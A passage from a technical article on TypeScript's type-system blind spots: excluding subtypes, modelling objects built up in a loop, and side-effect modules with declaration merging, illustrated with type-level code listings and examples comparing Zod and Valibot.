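A short sketch of how this assumption can fail (the payload object is hypothetical):

function takesWeakSet(m: WeakSet<any>) {
  // Assumes weak references: once the caller drops the object,
  // the garbage collector may reclaim it
  m.add({ payload: new Array(1_000_000).fill(0) });
}

takesWeakSet(new WeakSet()); // fine: the entry can be collected
takesWeakSet(new Set());     // compiles, but the Set keeps a strong
                             // reference, so the entry is retained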

So, while it’s often safe to accept subtypes of a given type, it’s not always so straightforward. In this case, the implementation is relatively simple, but it’s not possible to generalize this approach.

iJS Newsletter

Keep up with JavaScript’s latest news!

Unfortunately, subtypes have to stay out

With type-level programming, it’s comparatively easy to construct a type that accepts another type but rejects its subtypes. The key tool for this is generic types, which we can consider to be type functions (Listing 5).

Listing 5: Generic Types as Type Functions

// Type function that wraps the parameter T
// in an array
type Wrap<T> = [T];

// Corresponding JS function that
// wraps the parameter t in an array
let wrap = (t) => [t];

In generic types, we can use conditional types, which work just like the ternary operator in JavaScript (Listing 6).

Listing 6: Conditional Types

// A extends B = "is A assignable to B?"
// In other words: "is A a subtype of B?"
type Test<T> = T extends number ? true : false;

type A = Test<42>; // true (42 is assignable to number)
type B = Test<[]>; _// false ([] is not assignable to number)

Equipped with this knowledge, we can now formulate a type function that accepts two type parameters and determines whether the first parameter exactly matches the type of the second parameter. This is true only if the first parameter is assignable to the second and the second parameter is assignable to the first. If either of these conditions doesn’t apply, then either the first parameter must be a subtype of the second, the second must be a subtype of the first, or both parameters must be completely incompatible. In code, this is illustrated in Listing 7.

Listing 7: ExactType<Type, Base>

type ExactType<Type, Base> =
  Type extends Base
    ? Base extends Type
      ? Type
      : never
    : never;

type A = ExactType<WeakSet<any>, WeakSet<any>>;
// Result: WeakSet<any> - A and B are the same

type B = ExactType<Set<any>, WeakSet<any>>;
// Result: never - A is a subtype of B

type C = ExactType<WeakSet<any>, Set<any>>;
// Result: never - B is a subtype of A

type D = ExactType<WeakSet<any>, string>;
// Result: never - A and B are incompatible

The type never, used here to model the case where the type and base are different, is a type to which no value can be assigned. Each data type represents a set of possible values (e.g., number is the set of all numbers and Array<string> is the set of all arrays filled with strings), while never represents the empty set. No error, no exception: never simply stands for nothing.
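
A short sketch illustrates both directions of this property (minimal, for illustration only):

declare let impossible: never;

// never is assignable to every other type ...
let n: number = impossible;

// ... but no value is assignable to never:
// impossible = 42; // Error: Type 'number' is not assignable to type 'never'.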

We can now use ExactType<Type, Base> to modify takesWeakSet() so that it only accepts weak sets. We just have to make the function generic and then define the type for the value parameter m with ExactType (Listing 8).

Listing 8: ExactType<Type, Base> in action

type ExactType<Type, Base> =
  Type extends Base
    ? Base extends Type
      ? Type
      : never
    : never;

function takesWeakSet<T>(m: ExactType<T, WeakSet<any>>) {}

// Works obviously
takesWeakSet(new WeakSet());

// No longer works!
takesWeakSet(new Set());

The reason why the call with the normal set does not work is that ExactType<Type, Base> computes the type never as a result here, and since no value (and certainly no set object) fits into never, the TypeScript compiler complains at this point as desired. Problem solved?

The difficulty of excluding subtypes in type parameters

If we can treat generic types like functions, as we suggested earlier, then it should be possible to reproduce the features of the runtime function takesWeakSet() as a type function. After all, it’s now just a single-parameter function whose input is restricted to an exact type. The skeleton, a generic type with a type parameter, is easy to set up:

type TakesWeakSet<M> = {}; 

Since any arbitrary data type could be passed in here, we need a constraint for the type parameter M. Fortunately, this isn’t a problem, as extends clauses can be used both in conditional types and as restrictions for type parameters:

type TakesWeakSet<M extends WeakSet<any>> = {}; 

This puts the type function in the same state that takesWeakSet() was in initially: it’s a single-argument function with a type annotation that specifies a minimal requirement for the input. Subtypes are still accepted (Listing 9).

Listing 9: Subtypes as Input

type TakesWeakSet<M extends WeakSet<any>> = {};

// Obviously works
type A = TakesWeakSet<WeakSet<any>>;

// Also works, Set is a subtype of WeakSet
type B = TakesWeakSet<Set<any>>;

At first glance, that’s not a problem; it’s exactly why we wrote ExactType. However, there is a fundamental difference between the type function TakesWeakSet<M> and the runtime function takesWeakSet(m). The latter, if we look closely, has one more parameter than the former (Listing 10).

Listing 10: Type and runtime function in comparison

// One type parameter "M"
type TakesWeakSet<M extends WeakSet<any>> = {};

// One value parameter "m" AND one type parameter T
function takesWeakSet<T>(m: ExactType<T, WeakSet<any>>) {}

A call to the runtime function takesWeakSet() passes two parameters: a type parameter and a value parameter. The type parameter is used to calculate the type of the value parameter, where an error occurs if ExactType returns never. The type function ExactType is key to excluding subtypes. This trick can’t be reproduced at the type level because self-referential type parameters aren’t allowed, except in a few special cases that aren’t relevant here (Listing 11).

Listing 11: No self-referential constraints in type parameters

// Error: type parameter "Type" has
// a circular constraint
type TakesExact<Type extends ExactType<
  Type,
  WeakSet<any>>
> = {};

What would work, however, is to move the logic from ExactType to TakesExact. This wouldn’t reject subtypes, but would instead translate them to never, resulting in no error, just a likely unhelpful result (Listing 12).

Listing 12: TakesExact with the logic of ExactType

type TakesExact<Type> = Type extends WeakSet<any>
  ? WeakSet<any> extends Type
    ? Type
    : never
  : never;

type R1 = TakesExact<WeakSet<{}>>;
// OK, R1 = WeakSet<{}>

type R2 = TakesExact<Set<string>>;
// OK, R2 = never (NO error)

type R3 = TakesExact<Array<string>>;
// OK, R3 = never (NO error)
 

Regardless of how you approach it, rejecting parameters that are subtypes of a given type or enforcing an exact type at the type level isn’t possible. TypeScript has a blind spot here. But is this truly a problem?


How do we deal with subtype constraints at the type level?

The golden rule of programming in statically typed languages is: “Make invalid states unrepresentable.” If developers can write code in such a way that it prevents the program from taking wrong paths (e.g., by using exact type annotations to eliminate invalid inputs), they can save a lot of time debugging unwanted states. In principle, this rule is invaluable and should be followed whenever possible. However, it isn’t always feasible in the unpredictable world of JavaScript and TypeScript development.

To summarize, our goal was to create a program where a variable of type T can only be assigned values of type T and not any of its subtypes. We’ve succeeded in doing this in the runtime code, but we’ve failed at the type programming level. However, according to the Liskov substitution principle, this restriction may be unnecessary. After all, a subtype of T inherently has all the functions of T, so why do we need the restriction in the first place?

In our case, the key factor is that a Set and a WeakSet have very different semantics, even though the WeakSet API is a subset of the API of Set. In TypeScript’s type system, this means that Set is evaluated as a subtype of WeakSet, leading to the assumption of a relationship and substitutability where none exists. This blind spot in the type system leads us to solve a problem that isn’t actually a problem at all, and which we ultimately can’t resolve, especially at the type level.

Instead, we have to accept that the TypeScript type system doesn’t correctly model every detail of JavaScript objects and their relationships. Structural subtyping is a very pragmatic approach for a type system that attempts to describe JavaScript, but it’s not particularly selective. If we find ourselves in a situation where we want to ban subtypes from certain program parts despite TypeScript’s resistance, we should ask ourselves two questions:

  1. Do we really need to exclude subtypes, or could the program be rewritten to work with subtypes like any other program?
  2. Are we trying to exclude subtypes to compensate for blind spots in the TypeScript type system (as in the Set/WeakSet example)?

For the second case, the solution is simple: don’t use the type system for this task. Trying to exclude subtypes is essentially working against what TypeScript is designed to do (a type system based on structural subtyping) and attempting to compensate for a limitation within TypeScript itself. A more pragmatic approach would be to simply defer the distinction between two types that TypeScript has assessed incorrectly to the runtime. In the case of Set and WeakSet, this is particularly trivial because JavaScript knows that these two objects are unrelated (Listing 13).

Listing 13: Runtime distinction between Set and WeakSet

new WeakSet() instanceof WeakSet
// > true

new Set() instanceof WeakSet
// > false
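
Applied to our example, such a runtime guard could look like this (a minimal sketch; the error message is illustrative):

function takesWeakSet(m: WeakSet<any>) {
  if (!(m instanceof WeakSet)) {
    // A Set passes the structural type check, but not this runtime check
    throw new TypeError("Expected a real WeakSet");
  }
  // From here on, we can safely rely on WeakSet semantics
}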

“Make invalid states unrepresentable” is still a valuable guideline. However, in TypeScript, we sometimes need to use methods other than the type system to implement this, because the type system can’t accurately model every relationship between JavaScript objects. The type system only looks at the API surfaces of objects, and sometimes seemingly related surfaces hide entirely different semantics. In such cases, we shouldn’t use the type system to solve the problem but rather use a more appropriate solution.

Blind Spot 2: Non-Modelable Intermediate States

Combining an object from a list of keys and a parallel list of values of the same length is trivial in JavaScript, as we see in Listing 14.

Listing 14: JS function combines two lists into one object

function combine(keys, vals) {
  let obj = {};
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

let res = combine(["foo", "bar"], [1337, 9001]);

// res = { foo: 1337, bar: 9001 }

Imperative programming doesn’t get any easier than this: you take a bunch of variables and manipulate them until the program reaches the desired target state. But as we all know, this programming style can be error-prone. Every for loop is an off-by-one error in the making. So it makes sense to secure this code snippet as thoroughly as possible with TypeScript.

First, we need to ensure that keys and values are tuples (i.e. lists whose length is statically known). The content of keys should be restricted to valid object-key data types, while values can contain arbitrary values but must have exactly the same length as keys. This isn’t particularly difficult: we can constrain the type variable K for keys to be a tuple with matching content, and then use K as a template to create a tuple of the same length filled with any, which is exactly the appropriate restriction for values (Listing 15).

Listing 15: Function signature restricted to two tuples of equal length

type AnyTuple<Template extends any[]> = {
  [I in keyof Template]: any;
};

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  // ... Rest ...
}

With a type K of all keys and a type V of all values, we can then construct an object type that describes the result of the combine() operation. This is a bit complex, but we can manage. First, we need the auxiliary type UnionToIntersection<T>, which, as the name suggests, turns the members of a union T into an intersection type. The syntax looks a bit weird, and the underlying mechanics of distributive conditional types are equally strange. Overall, I prefer not to dive into the details right now. The key takeaway is that UnionToIntersection<T> turns a union into an intersection (Listing 16).

Listing 16: UnionToIntersection<T>

type UnionToIntersection<T> =
  (T extends any ? (x: T) => any : never) extends
  (x: infer R) => any ? R : never;

type Test = UnionToIntersection<{ x: number } | { y: string }>;
// Test = { x: number } & { y: string }
 

With this tool, we can now model a type that, similar to the combine() function, combines two tuples into one object, if we can think creatively. Step 1 is to write a generic type that accepts the same type parameters as combine() (Listing 17).

Listing 17: Type Combine<K, V>

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {};

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = {}

Step 2: A new tuple is temporarily created with a mapped type that has the same number of positions as K and V (Listing 18).

Listing 18: Two tuples become one tuple

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: any;
}

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = [any, any]

At first glance, this maneuver seems to distract us from our actual goal, as we want to turn tuples into an object, not just another tuple. However, to do this, we need access to the indices of the input tuples, which is achieved here by the type variable Index. This allows us to replace the any on the right side of the mapped type with an object type that models a name-value pair of our target object (Listing 19).

Listing 19: Two tuples become one tuple of objects

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
};

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = [{ foo: 1337 }, { bar: 9001 }]

Now we get a tuple that at least contains all the building blocks of our target object. To unpack it, we index the tuple with number, which leads us to a union of the tuple contents (Listing 20). We can then combine this union into an object type using UnionToIntersection<T> (Listing 21). Mission accomplished!

Listing 20: Two tuples become a union of objects

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = {
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
}[number];

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = { foo: 1337 } | { bar: 9001 }

Listing 21: Two tuples become one object

type Combine<
  K extends (string | symbol | number)[],
  V extends AnyTuple<K>
> = UnionToIntersection<{
  [Index in keyof K]: {
    [Field in K[Index]]: V[Index];
  };
}[number]>;

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Test = { foo: 1337, bar: 9001 }
// Strictly speaking: { foo: 1337 } & { bar: 9001 }

The result is syntactically a bit strange, but at the type level it does what the combine() function does in the runtime area: two tuples in, combined object out (Listing 22).

Listing 22: Combine Type vs. Combine Function

type Test = Combine<["foo", "bar"], [1337, 9001]>;
// Type "Test" = { foo: 1337, bar: 9001 }

let test = combine(["foo", "bar"], [1337, 9001]);
// Value "test" = { foo: 1337, bar: 9001 }

And if we have a type that models the exact same operation as a runtime function, we can logically use the former to annotate the latter. Right?

The problem with the imperative iteration

Before we add Combine<K, V> to the signature of combine(keys, values), we should fire up TypeScript and ask what it thinks of the current state of our function (without return type annotation). The compiler is not impressed (Listing 23).

Listing 23: Current state of combine()

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj = {};
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i]; // <- Error here
  }
  return obj;
}

The key part of the error message is “No index signature with a parameter of type ‘string’ was found on type ‘{}’”. The reference to the type {} comes from the initialization of the obj variable two lines earlier. Since there is no type annotation, the compiler activates its type inference and determines the type {} for obj, based on its initial value: the empty object. Naturally, this means we can’t add any additional fields to this type. But is this type even correct? After all, the function is supposed to return Combine<K, V>. So we annotate the variable at its initialization with the type it should have at the end (Listing 24).

Listing 24: combine() with Combine<K, V> as annotation

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj: Combine<K, V> = {}; // <- Error here
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

Another error appears. This time, TypeScript reports “Type ‘{}’ is not assignable to type ‘Combine<K, V>’”, which is also understandable. After all, we’re claiming that the variable obj contains the type Combine<K, V> but we’re initializing it with the incompatible value {}. That can’t be correct either. So, what is the correct approach?

The truth is, nothing is correct. The operation that combine(keys, values) performs is not describable with TypeScript in the way it’s implemented here. The problem is that the result object obj mutates from {} to Combine<K, V> in several intermediate steps during the for loop, and that TypeScript doesn’t understand such state transitions. The whole point of TypeScript is that a variable has exactly one type, and it can’t change types (unlike in vanilla JavaScript). However, such type changes are essential in scenarios where objects are iteratively assembled because each mutation represents a new intermediate state on the way from A to B. TypeScript can’t model these intermediate states, and there is no correct way to equip the combine(keys, values) function with type annotations.
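
To visualize these intermediate states, here is a sketch in which the comments contrast the runtime shape with the static type:

let obj = {};      // runtime: {}                         static type: {}
obj["foo"] = 1337; // runtime: { foo: 1337 }              static type: still {} -> error
obj["bar"] = 9001; // runtime: { foo: 1337, bar: 9001 }   static type: still {} -> error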


What to do with intermediate states that can’t be modeled?

The TypeScript type system is a huge system of equations in which the compiler searches for contradictions. This always happens for the program as a whole and without executing the program. This means that, by design, TypeScript can’t fully understand various language constructs and features, no matter how hard we try. Under these circumstances, the question arises: if we can’t do it right, what should we do instead?

One option is to align the runtime code more closely with the limitations of the type system. After all, there are various means of functional programming in runtime JavaScript. Instead of writing types that are oriented towards runtime JavaScript, it’s often possible to write runtime JavaScript that is based on the types. However, this doesn’t always work and may not be feasible in some teams. Some developers may enjoy writing JavaScript code in such a way that every loop is replaced by recursion, while others would like to keep their imperative language constructs, especially async/await and try/catch.
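
As a sketch of what runtime code oriented toward the types could look like here: combine() can be rewritten declaratively with Object.fromEntries(), reusing the AnyTuple and Combine types from the earlier listings. Note that a type assertion is still required at the boundary:

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V): Combine<K, V> {
  // The object is built in a single expression, so no mutable
  // intermediate state is visible to TypeScript ...
  return Object.fromEntries(
    keys.map((key, i): [PropertyKey, unknown] => [key, vals[i]])
  ) as unknown as Combine<K, V>;
  // ... but the loosely typed result of Object.fromEntries still
  // has to be asserted to Combine<K, V> at the boundary.
}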

The more pragmatic solution is to accept the possibilities and limitations of our tools and work with what we have. Unmodelable intermediate states are bound to occur when writing low-level imperative code. If the type system can’t represent them, we need to handle them in other ways. Unit tests can ensure that the affected functions do what they’re supposed to do, documentation and code comments are always helpful, and for an extra layer of safety, we can use runtime type-checking if needed.

I’ve adapted a feature from the programming language Rust for functions with an imperative core that is inscrutable to TypeScript. Rust’s type system is stricter than TypeScript’s, enforcing much more granular rules about data and objects. However, there is a way out: code blocks marked with the unsafe keyword can (to some extent) perform operations that the type system would normally prevent (Listing 25).

Listing 25: unsafe in Rust

// This Rust program uses the C language's foreign
// function interface for the abs() function,
// which the Rust compiler cannot guarantee anything about
extern "C" {
  fn abs(input: i32) -> i32;
}

// To be able to call the C function abs(),
// the corresponding code must be wrapped in "unsafe"
fn main() {
  unsafe {
    println!(
      "Absolute value of -3 according to C: {}",
      abs(-3)
    );
  }
}

In its core idea, it’s somewhat comparable to the TypeScript type any, as in both cases developers assume responsibility for what the type checker would normally do. The advantage of unsafe in Rust is that it directly signals that the compiler doesn’t guarantee type safety for the affected area and that maximum caution is required when using it. This is precisely what we want to express for our combine(keys, values) function. First, we have to get the function to work by typing the result object as any (Listing 26).

Listing 26: combine() with any

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V) {
  let obj: any = {}; // <- anything goes
  for (let i = 0; i < keys.length; i++) {
    obj[keys[i]] = vals[i];
  }
  return obj;
}

This makes the code in the function executable and the compiler no longer complains, since any allows everything. We can now use our type Combine<K, V> to annotate the return type (Listing 27).

Listing 27: combine() with any and Combine<K, V>

function combine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V): Combine<K, V> {  // <- works
  /* Rest */
}

This works because a value of type any may also be assigned to another, stricter type. The function now has a very well-defined interface with strict input and output types, but a core that isn’t protected by the type system. For trivial functions, it’s sufficient to ensure correct behavior with unit tests, and to make the character of the function even more obvious, you could add unsafe to its name (Listing 28).

Listing 28: unsafeCombine()

function unsafeCombine<
  const K extends (string | symbol | number)[],
  const V extends AnyTuple<K>
>(keys: K, vals: V): Combine<K, V> {
  /* Rest */
}

Anyone who calls this function can tell from its name that special care is required. Reading the source code makes it clear that the any annotation on the return object wasn’t added out of desperation, time pressure, or inexperience by the developers, but rather as a workaround for a TypeScript blind spot based on careful consideration. No tool is perfect (especially not TypeScript), and dealing with a tool’s limitations confidently and pragmatically is the hallmark of true professionals.
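
Thanks to the const type parameters, callers of the finished function get precise result types without any extra annotations on their side. A brief usage sketch (reusing the values from the earlier examples):

const res = unsafeCombine(["foo", "bar"], [1337, 9001]);
// Inferred result type: { foo: 1337 } & { bar: 9001 }

res.foo; // 1337 - fully typed
// res.baz; // Error: property 'baz' does not exist on the result type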

Blind spot 3: Side effects of mix-in modules

For most developers, ECMAScript modules are synonymous with the keywords import and export, but these don’t determine whether a piece of JavaScript is considered a module. For a JS engine, “ECMAScript module” is primarily a separate loading and operating mechanism for JavaScript programs in which

  1. Permanent strict mode applies without opt-out
  2. Programs, similar to scripts with the defer attribute, are loaded asynchronously and executed in browsers only at the DOMContentLoaded event
  3. import and export can be used

Thus, the following JavaScript program can be considered and treated as an ECMAScript module:

// hello.js
window.alert("Hello World!");

This mini-module contains no code that violates strict mode. It can handle contact with a fully processed DOM without crashing and can be easily loaded as a module by browsers:

<script type="module" src="hello.js"></script>

The presence of the keywords import and export indicates that a JavaScript program is intended to be a module and is only executable in module mode. However, their absence doesn’t mean a program can’t be a module. In most cases, using import and/or export in modules makes sense, but not always: For example, if you want to activate a global polyfill, you don’t have to export anything. Instead, you can directly modify the relevant global objects. This use case may seem a bit unusual (after all, who regularly writes new polyfills?), but the world might be a little better if this use case weren’t so rare.
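
To make this concrete, here is a sketch of such a side-effect-only module. The example assumes a lib setting that already includes ES2022 (so TypeScript knows the at() method), and the polyfill itself is simplified for illustration:

// at-polyfill.ts - no imports, no exports:
// loading this module IS the feature
if (!Array.prototype.at) {
  Array.prototype.at = function (this: unknown[], index: number) {
    // Translate negative indices, just like the native implementation
    return this[index < 0 ? this.length + index : index];
  };
}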

Modularity vs. fluent interfaces

Zod is a popular and powerful data validation library for JavaScript and TypeScript. It offers a highly convenient, fluent interface for describing data schemas, validates data against those schemas, and, as a special treat, can derive TypeScript types from the schemas (Listing 29).

Listing 29: Zod in action

import { z } from "zod";

const User = z.object({
  name: z.string(),
  mail: z.string().email(),
});

User.parse({
  name: "Test",
  mail: "test@example.com",
}); // > OK, no error

type User = z.infer<typeof User>;
// > TS-Type { name: string, mail: string }

The fluent interface with the simple chaining of method calls makes Zod particularly attractive. However, this chaining comes at a price: the z object contains every schema validation feature of Zod at all times, even if, as in the example above, only the object, string, and email functions are used. The result is that, when compiled and minified with esbuild, the 14 lines of code shown above turn into a bundle of over 50 kB. For frontend applications where loading performance is an issue, the use of Zod is therefore out of the question.

This doesn’t mean there is anything wrong with Zod, and it isn’t an issue when Zod is used on the server side. The inclusion of the entire library’s code in the bundle, even when only one feature is used, is an unavoidable result of its highly convenient API design. For Zod to work, the z object must be a normal JavaScript object carrying all the features, which means that bundler-based tree shaking (dead code elimination) can’t be applied. The Zod developers decided to accept a larger bundle in exchange for a better API design, perhaps because the “frontend” use case wasn’t that important to them, or because they considered convenience and developer experience to be more important. And that’s perfectly fine.

For comparison, the self-proclaimed “<1-kB Zod alternative” Valibot uses a completely different API design from Zod to stay under a kilobyte (Listing 30).

Listing 30: Valibot in action

import {
  type Output,
  parse,
  object,
  string,
  email,
} from "valibot";

const User = object({
  name: string(),
  mail: string([email()]),
});

parse(User, {
  name: "Test",
  mail: "test@example.com",
}); // > OK, no error

type User = Output<typeof User>;
// > TS-Type { name: string, mail: string }

We see the same feature set as Zod with just one key difference: the fluent interface is no longer supported. Chained conditions (e.g., “this must be a string and the string must be an email address”) are modeled by manually imported and manually composed functions. This makes tree shaking by module bundlers like esbuild easy, but the API is no longer as convenient.

In other words, fluent interfaces are nice, but they don’t always align with the performance optimizations necessary for frontend performance. Or do they?

The Versatile Swiss Army Knife (in JavaScript)

A Zod-style fluent interface can be implemented in JavaScript as well as in TypeScript using a few object methods that return this (Listing 31).

Listing 31: Basic Fluent Interface

const fluent = {
  object() {
    return this;
  },
  string() {
    return this;
  },
  email() {
    return this;
  },
}

fluent.string().email(); // Runs!

If we step away from the constraints of type safety and delve into pure JavaScript, we can assemble the object behind the fluent interface piece by piece instead of declaring it centrally (Listing 32).

Listing 32: Piece-wise fluent interface

const fluent = {};

fluent.object = function() {
  return this;
};

fluent.string = function() {
  return this;
};

fluent.email = function() {
  return this;
};

fluent.string().email(); // Success!

In JavaScript, there’s no reason not to split this piecemeal assembly across individual modules. We just need to ensure that the fluent object is some kind of singleton, which could be implemented, for example, by a core module imported everywhere (Listing 33).

Listing 33: Modularized Fluent Interface

// Core Module "fluent.js"
const fluent = {};
export { fluent };

// Module "object.js"
import { fluent } from "./fluent.js";
fluent.object = function () {
  return this;
};

// Module "string.js"
import { fluent } from "./fluent.js";
fluent.string = function () {
  return this;
};

// Module "email.js"
import { fluent } from "./fluent.js";
fluent.email = function () {
  return this;
};

The core module fluent.js initializes an object that is imported and extended by all feature modules. This means that only explicitly imported features can be used (and take up kilobytes), but we retain a fluent interface comparable to Zod (Listing 34).

Listing 34: Modularized Fluent Interface in Action

// main.js
import { fluent } from "./fluent.js";
import "./string.js"; // patches string into "fluent"
import "./email.js"; // patches email into "fluent"

fluent.string().email(); // Works!
fluent.object(); // Error: object.js not imported

This minimal implementation of the modular fluent pattern is clearly just a demonstrator showing what could be possible in principle: modularity and method chaining peacefully united. Hardly anyone writes modules as pure side effects that patch arbitrary objects, outside of the polyfill use case. But why not? After all, we could have fluent interfaces and tree shaking. Admittedly, there is a small detail known as “TypeScript” that complicates matters.


Declaration merging, but unconditionally

TypeScript is no stranger to the established JavaScript practice of patching arbitrary objects. It’s an official part of the language via declaration merging. If we create two interface declarations with identical names, this isn’t considered a naming collision, but a distributed declaration (Listing 35).

Listing 35: Declaration Merging

interface Foo {
  a: number;
}

interface Foo {
  b: string;
}

declare let x: Foo;
// { a: number; b: string }

TypeScript uses this mechanism primarily to support extensions of string-based DOM APIs, such as document.createElement(). This function is known to be able to fabricate an instance of an appropriate type from an HTML tag (Listing 36).

Listing 36: document.createElement() in action

let a = document.createElement("a");
// a = HTMLAnchorElement
let t = document.createElement("table");
// t = HTMLTableElement
let y = document.createElement("yolo");
// y = HTMLElement (base type)

So document.createElement() knows that the tag a yields an instance of HTMLAnchorElement, that the tag table produces an HTMLTableElement, and that, as of August 2024, no specified element <yolo> exists. But how does TypeScript know all this? The answer is simple: at the core of TypeScript's DOM type definitions, there is a large interface declaration that maps HTML tags to subtypes of HTMLElement (Listing 37).

Listing 37: HTMLElementTagNameMap

interface HTMLElementTagNameMap {
  "a": HTMLAnchorElement;
  "abbr": HTMLElement;
  "address": HTMLElement;
  "area": HTMLAreaElement;
  "article": HTMLElement;
  "aside": HTMLElement;
  "audio": HTMLAudioElement;
  "b": HTMLElement;
  ...
}
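
From this map, TypeScript derives the behavior of document.createElement(). Slightly simplified, the relevant overloads in lib.dom.d.ts look like this:

interface Document {
  // Known tag: look up the precise element type in the map
  createElement<K extends keyof HTMLElementTagNameMap>(
    tagName: K,
    options?: ElementCreationOptions
  ): HTMLElementTagNameMap[K];
  // Unknown tag: fall back to the HTMLElement base type
  createElement(tagName: string, options?: ElementCreationOptions): HTMLElement;
}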

Thanks to these overloads, document.createElement() returns, for a given HTML tag, an instance of the matching subtype, with the basic HTMLElement as the fallback for unknown HTML tags. And what do we do when unknown HTML tags become known HTML tags through Web Components? We merge new fields into the interface (Listing 38).

Listing 38: Declaration merging for web components

export class MyElement extends HTMLElement {
  foo = 42;
}

window.customElements.define("my-el", MyElement);

declare global {
  interface HTMLElementTagNameMap {
    "my-el": MyElement;
  }
}

let el = document.createElement("my-el");
el.foo; // number - el is a MyElement

The class declaration or the call to customElements.define() tells the browser at runtime that a new HTML element with a matching tag now exists, while the global interface declaration informs the TypeScript compiler about this new element. It’s therefore possible to extend global objects and have TypeScript record them correctly, and it is not even particularly difficult.

What happens if we move the above web component into its own module in our TypeScript project, fail to import this module, and still call document.createElement("my-el") (Listing 39)?

Listing 39: Unconditional Declaration Merging

// Import disabled!
// import "./component";

const el = document.createElement("my-el");
el.foo; // number - el is still a MyElement

The commented-out component remains completely unknown to the browser, while TypeScript still assumes that the affected HTML tag can be used. This happens because TypeScript considers types on a per-package basis: if a global type declaration exists anywhere in the project or in one of its packages, it’s treated as being in effect. At the level of individual modules, TypeScript can’t understand that specific imports are needed for the declared types to actually take effect at runtime.

What to do about the side effects of mix-in modules?

In principle, managing this cleanly in TypeScript requires a somewhat blunt approach: since TypeScript considers types on a per-package rather than a per-module basis, we can convert the relevant modules into (quasi-)packages. Depending on the build setup, this can require more or less effort. The main step is to create a new folder for our module packages in the project and to use the exclude option to remove it from the view of the main project’s tsconfig.json. The modules can now be moved into this folder, hidden from the compiler, so that TypeScript processes the type declarations inside them only when the corresponding modules/packages are actually imported.

The tricky question now is what our project and build system will accept as a “package”. If we don’t run the TypeScript compiler tsc at all, or only with the options noEmit or emitDeclarationOnly (i.e. when the TypeScript compiler doesn’t have to output JavaScript, but at most .d.ts files), we can activate the compiler option allowImportingTsExtensions. This allows us to directly import the .ts files from the module packages folder, and thus activate only those global declarations that are actually imported (Listing 40).

Listing 40: Conditional declaration merging through packages

// packages/foo/index.ts
declare global {
  interface Window {
    foo: number; // new: window.foo
  }
}
export {}; // Boilerplate, ignore!

// packages/bar/index.ts
declare global {
  interface Window {
    bar: string; // new: window.bar
  }
}
export {}; // Boilerplate, ignore!

// index.ts
import "./packages/foo/index.ts";
window.foo; // <- Imported, works!
window.bar; // <- Not imported, error!
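
For reference, here is a minimal tsconfig sketch under which Listing 40 works; the option names are real, while the folder layout is illustrative:

{
  "compilerOptions": {
    // allowImportingTsExtensions requires noEmit or emitDeclarationOnly
    "noEmit": true,
    "allowImportingTsExtensions": true
  },
  // Hide the module packages from the main project; their global
  // declarations then only apply once a package is actually imported
  "exclude": ["packages"]
}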

If, on the other hand, we need the JavaScript output of tsc, it gets a bit more complicated. In this case, the compiler option allowImportingTsExtensions isn’t available and the module packages have to be upgraded to more or less “correct” packages, including their own package.json. Depending on how many such “packages” you want to end up with in your project, this additional effort can either remain manageable or escalate into something completely unacceptable.

Side effects of mix-in modules remain a blind spot of TypeScript because, by fundamental design, the types known to the TypeScript compiler are determined at the package level, not at the level of individual ECMAScript modules. Any workaround we can come up with has major or minor drawbacks. We can either accept them, try to minimize their effects by adjusting our project or build setup, or simply accept the blind spot. But is it really a problem if the type system thinks an API is available when it isn’t? For a module with a fluent interface, definitely. For web components, maybe not. And for other use cases? It depends on the circumstances.


Conclusion: TypeScript isn’t perfect

TypeScript aims to describe JavaScript’s behavior using a static type system, and it does this far better than we might expect. Almost every bizarre behavior of JavaScript can be partially managed by the type checker, with true blind spots existing only in a few peripheral aspects. However, as we’ve seen in this article, these fringe aspects are not without practical relevance, and as TypeScript professionals, we need to acknowledge that TypeScript is not perfect.

So how do we deal with these blind spots in our projects? Personally, I’m a big fan of a pragmatic approach to using tools of all kinds. Tools like TypeScript are machines that we developers operate, not the other way around. When in doubt, I prefer to occasionally accept an any or a few data types that are 99% correct. If an API can be significantly improved through elaborate type juggling, it may justify spending hours in the type-level coding rabbit hole.

However, fighting against the fundamental limitations of TypeScript is rarely worth the effort. There is no prize for the smallest possible number of anys, no bonus for particularly complex type constructions, and no promotion for a function definition that is 0.1% more watertight. What matters is a functioning product, maintainable code, and efficiency in execution and development, always considering what is possible given the current circumstances and available tools.
